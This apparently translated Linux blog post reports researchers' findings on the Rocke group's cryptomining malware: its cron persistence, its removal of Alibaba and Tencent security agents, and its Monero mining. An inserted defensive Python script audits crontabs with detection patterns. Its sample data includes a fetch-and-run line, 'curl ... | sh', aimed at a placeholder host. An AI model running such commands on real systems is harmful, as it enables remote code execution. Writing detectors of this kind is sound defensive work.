
Cryptocurrency mining malware can affect Linux

Diolinux

It is common to hear the statement “Linux has no virus”, and this is far from reality. It is true that Linux-based systems have a very high level of security, and that even simple tasks, such as installing an application, require administrator permission.

But Linux is not immune to failures, much less invulnerable, as the saying goes.

Linux vs. Virus

Even though it is not so simple to be infected on Linux, such threats do exist, and new cases occur every day. Sometimes the claims are fanciful, other times they are true.

If you would like to really understand “why Linux doesn’t catch viruses”, we have detailed content on the subject.

Security researchers at Unit 42 warn of new malware for Linux. Palo Alto Networks, a leader in cybersecurity, recently discovered malware that uses vulnerabilities in Apache Struts 2, Oracle WebLogic and Adobe ColdFusion to inject a malicious script called “a7”. This script achieves persistence using cron jobs; cron is a software utility that automatically schedules and performs tasks in the operating system.
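A defender's check for the cron persistence described above, as an added example that is not from the original post or from the researchers' report: it parses crontab lines in both the user and system formats and flags entries that download and run content or execute from world-writable directories. The rule patterns, function names and sample entries are assumptions constructed for illustration.

```python
import re

# Heuristic rules (assumptions for illustration, not indicators from the report):
# commands that pipe downloaded or decoded content to a shell, or run from world-writable dirs.
SUSPICIOUS = {
    "fetch-and-exec": re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba|da|z)?sh\b"),
    "decode-and-exec": re.compile(r"\bbase64\s+(-d|--decode)\b[^|]*\|\s*(ba|da|z)?sh\b"),
    "world-writable-path": re.compile(r"(^|[\s;&|])/(tmp|var/tmp|dev/shm)/\S+"),
}
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")

def split_cron_line(line, system=False):
    """Return (schedule, user, command); None for blank, comment, env or malformed lines.
    system=True parses the /etc/crontab and /etc/cron.d format, which has a user field."""
    line = line.strip()
    if not line or line.startswith("#") or ENV_LINE.match(line):
        return None
    n_sched = 1 if line.startswith("@") else 5   # @reboot, @hourly, ... are one field
    n_lead = n_sched + (1 if system else 0)      # fields that precede the command
    parts = line.split(None, n_lead)
    if len(parts) <= n_lead:
        return None
    user = parts[n_sched] if system else None
    return " ".join(parts[:n_sched]), user, parts[-1]

def audit(lines, system=False):
    """Return a list of (line_number, rule_names, command) for flagged entries."""
    findings = []
    for no, raw in enumerate(lines, 1):
        entry = split_cron_line(raw, system)
        if entry is None:
            continue
        hits = [name for name, rx in SUSPICIOUS.items() if rx.search(entry[2])]
        if hits:
            findings.append((no, hits, entry[2]))
    return findings

# Constructed sample crontab; the host is a placeholder and the entries are invented.
SAMPLE = """\
SHELL=/bin/sh
# nightly backup
30 2 * * * /usr/local/bin/backup.sh
*/10 * * * * curl -fsSL http://example.invalid/a7 | sh
@reboot /dev/shm/.x/run >/dev/null 2>&1
""".splitlines()

if __name__ == "__main__":
    for no, hits, cmd in audit(SAMPLE):
        print(f"line {no}: {', '.join(hits)}: {cmd}")
```

Feed it the output of `crontab -l` for each account, and the contents of `/etc/crontab` and `/etc/cron.d/*` with `system=True`; a hit is a lead for review, not proof of compromise.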

The mining malware

After infecting the server, the malware removes the software responsible for system security. It hides its malicious process and kills any other processes that use rules in iptables and that also mine cryptocurrencies.

With the whole stage set, it starts to mine the coin “Monero”, which resembles Bitcoin.

The work of the “Rocke” cracker group, the software appears to look specifically for 5 cloud security protection and monitoring products.

Interestingly, all of the vulnerable security solutions are from Chinese companies:

  • Alibaba Threat Detection Service agent (AI-based detection engine);
  • Alibaba CloudMonitor agent (monitor for RAM consumption, CPU and network connectivity);
  • Alibaba Cloud Assistant agent (Software that manages instances automatically);
  • Tencent Host Security agent (AI-based detection engine);
  • Tencent Cloud Monitor agent (Monitor and network connectivity manager).

Malware trend

The team of researchers at Palo Alto Networks has already contacted the companies that offer these solutions. Now it is up to Alibaba and Tencent to resolve such vulnerabilities.

The researchers who discovered the malware see it as a possible trend among cybercriminals and believe that this model will be increasingly used by crackers.

As in most cases of viruses on Linux, the problem is caused by a vulnerability in other software and not by the way the system is managed. Security updates reduce these possibilities, and once the vulnerabilities are corrected, these problems are soon remedied.

And you, did you know that Linux also catches viruses? Or did you believe it did not? Don’t forget to visit the post where we explain all about “Linux does not catch viruses”.

I'll be waiting for you in the next post, SYSTEMATICALLY, here on the Diolinux blog.